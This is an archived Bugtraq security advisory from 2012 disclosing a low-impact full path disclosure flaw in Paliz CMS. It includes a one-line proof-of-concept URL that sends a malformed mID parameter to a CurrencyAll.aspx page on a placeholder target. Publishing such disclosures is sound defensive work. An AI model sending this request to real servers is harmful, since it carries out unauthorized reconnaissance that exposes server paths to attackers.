Bugtraq mailing list archives

Paliz CMS Full Path Disclosure Vulnerability

From: advisories () highsecure ir
Date: Sat, 25 Aug 2012 05:44:08 GMT

##################################################################################
# Title: Paliz CMS Full Path Disclosure Vulnerability
# Vulnerable Version: all versions
# Vendor URL: http://palizct.com
# Impact: Low
##################################################################################

===========================
Vulnerability Description:
===========================
Full Path Disclosure Vulnerability, enable the attacker to see the root path.

==================
Proof Of Concept:
==================

http://[target]/portal/DeskTopModules/Currency/CurrencyAll.aspx?mID=[]

=========
Credits:
=========

HighSecure.ir
Contact: advisories[aT]highsecure[dOt]ir

============
References:
============

http://www.highsecure.ir/research/20120822-paliz.txt

##################################################################################

Current thread:

Paliz CMS Full Path Disclosure Vulnerability advisories (Aug 27)